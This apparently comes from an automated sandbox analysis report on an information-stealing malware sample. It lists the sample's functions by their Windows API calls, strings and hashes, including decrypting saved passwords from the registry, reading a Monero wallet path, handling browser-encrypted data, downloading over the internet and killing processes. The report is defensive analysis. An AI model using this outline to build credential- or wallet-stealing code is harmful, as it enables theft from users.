                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID: %hs
                            • API String ID: 3729781310-2783943728
                            • Opcode ID: 782d5f3c68da43d376f3d0c46a0656f766a7cea65364b78cea5e8d6cbbb01d50
                            • Instruction ID: 3c11b0d965da6cf3d7bb320d2d0bdcc7d4c87f2e94996baf21306f3f697933dd
                            • Opcode Fuzzy Hash: 782d5f3c68da43d376f3d0c46a0656f766a7cea65364b78cea5e8d6cbbb01d50
                            • Instruction Fuzzy Hash: D8317171A10305BBDB11DBE4EC85FDEB77CAF49702F104055FA05E71A0DB70AA418BA5
                            Function 0013E229 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E24F
                            • lstrcat.KERNEL32(?,00000000), ref: 0013E25D
                            • lstrcat.KERNEL32(?,?), ref: 0013E278
                            • lstrcat.KERNEL32(?,?), ref: 0013E28C
                            • lstrcat.KERNEL32(?,013EB850), ref: 0013E2A0
                            • lstrcat.KERNEL32(?,?), ref: 0013E2B4
                            • lstrcat.KERNEL32(?,013FD998), ref: 0013E2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 0013E306
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 00b3cffeb69dc64e8d562f7cb2ed1fea47917931d81ef310f79c2b993aad71e3
                            • Instruction ID: da1ea6db77ead5336bac805caeeea4f3070833cb27368133d878b2936df3581a
                            • Opcode Fuzzy Hash: 00b3cffeb69dc64e8d562f7cb2ed1fea47917931d81ef310f79c2b993aad71e3
                            • Instruction Fuzzy Hash: 6E41907191023CEBCB26EB64EC45ADD73B8BF58310F004AA5F50A93294DB309F858F90
                            Function 00127A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 001277D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00127805
                              • Part of subcall function 001277D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0012784A
                              • Part of subcall function 001277D0: StrStrA.SHLWAPI(?,Password), ref: 001278B8
                              • Part of subcall function 001277D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 001278EC
                              • Part of subcall function 001277D0: HeapFree.KERNEL32(00000000), ref: 001278F3
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 00127A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00127ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00127ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00127AF0
                            • wsprintfA.USER32 ref: 00127B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00127B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00127B47
                            • lstrcat.KERNEL32(00000000,00154ADC), ref: 00127B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 6139abe4f1518a2f2714d4d2488dde9e2561a33ab68dc01696960fd4aa60cedc
                            • Instruction ID: 07ac56bf8fa322f9494315384800a66ef72e25d21d080cc3e2e03340f58e4852
                            • Opcode Fuzzy Hash: 6139abe4f1518a2f2714d4d2488dde9e2561a33ab68dc01696960fd4aa60cedc
                            • Instruction Fuzzy Hash: 3B31B872A04324EFCB11DFA8FC45AAFB77DEB84711F144519E906A3290DB70E955CB90
                            Function 001382F0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 0013834C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138383
                            • lstrlen.KERNEL32(00000000), ref: 001383A0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001383D7
                            • lstrlen.KERNEL32(00000000), ref: 001383F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013842B
                            • lstrlen.KERNEL32(00000000), ref: 00138448
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00138477
                            • lstrlen.KERNEL32(00000000), ref: 00138491
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001384C0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 425bb85fce9fd64b3c7911067fdb79c7a97b3ddd586fc0997bc858f591aace60
                            • Instruction ID: 3be22005f440400a4d7d2e976d19f1ba3dbf8db687e37dd8d41797bdc905721e
                            • Opcode Fuzzy Hash: 425bb85fce9fd64b3c7911067fdb79c7a97b3ddd586fc0997bc858f591aace60
                            • Instruction Fuzzy Hash: 6B512871901723ABDB159F68E848B6BB7A8EF14344F154514FC06EBA45EB30ED61CBE0
                            Function 001277D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00127805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0012784A
                            • StrStrA.SHLWAPI(?,Password), ref: 001278B8
                              • Part of subcall function 00127750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012775E
                              • Part of subcall function 00127750: RtlAllocateHeap.NTDLL(00000000), ref: 00127765
                              • Part of subcall function 00127750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0012778D
                              • Part of subcall function 00127750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 001277AD
                              • Part of subcall function 00127750: LocalFree.KERNEL32(?), ref: 001277B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001278EC
                            • HeapFree.KERNEL32(00000000), ref: 001278F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00127A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: 21bffbebd41f85848ea5543cd9edf618f99ad67782ec65ce64a11ecaad783e90
                            • Instruction ID: dc78eb81f93745f69d65988283f0e1b2a41112761b24abc1e101f75cfa226736
                            • Opcode Fuzzy Hash: 21bffbebd41f85848ea5543cd9edf618f99ad67782ec65ce64a11ecaad783e90
                            • Instruction Fuzzy Hash: F9712EB1D0021DEFDB10DF95DC80AEEB7B9EF58310F14456AE509A7250EB356A89CB90
                            Function 00121120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00121135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0012113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00121159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00121173
                            • RegCloseKey.ADVAPI32(?), ref: 0012117D
                            Strings
                            • wallet_path, xrefs: 0012116D
                            • SOFTWARE\monero-project\monero-core, xrefs: 0012114F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 738e7163812e8cf11f8f37c570fc4c5305014735d9e2f13cad6cb6a3cff09898
                            • Instruction ID: 87105dd997cf63a422cb5c1bab840b6f0a60d301c55569c0e4bac4af537a9f85
                            • Opcode Fuzzy Hash: 738e7163812e8cf11f8f37c570fc4c5305014735d9e2f13cad6cb6a3cff09898
                            • Instruction Fuzzy Hash: 83F09075640308FBD7019BA4AC4DFAB7B3CEB08716F000055FF04E6290D6B05A4487A0
                            Function 00129DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00129E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00129E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00129EA7
                              • Part of subcall function 001473F0: lstrcpy.KERNEL32(00000000,ERROR), ref: 0014740E
                            • lstrcpy.KERNEL32(00000000,00151C80), ref: 00129FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: 102c3305fd08351fa8ee434de8ec93bbeb9351df0ea875d291e70ad841dc16cf
                            • Instruction ID: 71f31cdb646025ecc4a7a4b39eb7d7fe5b36bac4104b0dde74fac263d1aae542
                            • Opcode Fuzzy Hash: 102c3305fd08351fa8ee434de8ec93bbeb9351df0ea875d291e70ad841dc16cf
                            • Instruction Fuzzy Hash: 7151F331A10229ABCB10EF68EC42B9E7BB8EF60315F150124FD09EB651DB70ED658BD0
                            Function 00125640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00125661
                            • InternetOpenA.WININET(0014CFF4,00000000,00000000,00000000,00000000), ref: 00125677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00125692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 001256BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 001256E1
                            • InternetCloseHandle.WININET(?), ref: 001256FA
                            • InternetCloseHandle.WININET(00000000), ref: 00125701
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 328c86b24fa73ae3c2e62a44c4b285da920f14fe30b9efce780af84568167a04
                            • Instruction ID: dcf12e578453711111bb744f6451805ccd97dbe3cdabcf5952009ec2497f1feb
                            • Opcode Fuzzy Hash: 328c86b24fa73ae3c2e62a44c4b285da920f14fe30b9efce780af84568167a04
                            • Instruction Fuzzy Hash: 4B41A270A40715EFDB15CF54EC88FAAB7B9FF48305F5480A9E9089B2A1D7719941CF90
                            Function 00144950 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00144969
                            • Process32First.KERNEL32(00000000,00000128), ref: 00144979
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0014498B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001449AC
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 001449BB
                            • CloseHandle.KERNEL32(00000000), ref: 001449C2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 001449D0
                            • CloseHandle.KERNEL32(00000000), ref: 001449DB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: f74d876d3e7361931601dd36656807e553e6311a8de81e6b733164c87a727179
                            • Instruction ID: 6650eb7a7d8e37de5ba1d9b98c357f41e0c19fdefddfa68dd8651ddfaa317754
                            • Opcode Fuzzy Hash: f74d876d3e7361931601dd36656807e553e6311a8de81e6b733164c87a727179
                            • Instruction Fuzzy Hash: 56019E71601318ABEB225B20EC89FEB777CEB0C756F000581F949E21B0EF749D908AA4
                            Function 0012E2FD Relevance: 10.9, APIs: 7, Instructions: 441stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E6EE
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E727
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E74D
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012E784
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0012E7BA
                            • FindClose.KERNEL32(00000000), ref: 0012E7C9
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            Memory Dump Source
